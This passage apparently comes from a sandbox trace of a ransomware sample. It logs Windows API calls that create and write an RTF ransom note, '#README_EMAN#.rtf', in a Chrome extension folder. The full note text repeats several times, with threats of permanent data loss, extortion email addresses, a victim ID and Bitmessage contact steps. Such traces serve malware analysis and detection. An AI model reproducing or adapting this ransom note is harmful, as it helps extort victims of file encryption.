(in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.173] CloseHandle (hObject=0x2ec) returned 1 [0291.173] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\#readme_eman#.rtf")) returned 0xffffffff [0291.173] GetLastError () returned 0x2 [0291.173] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 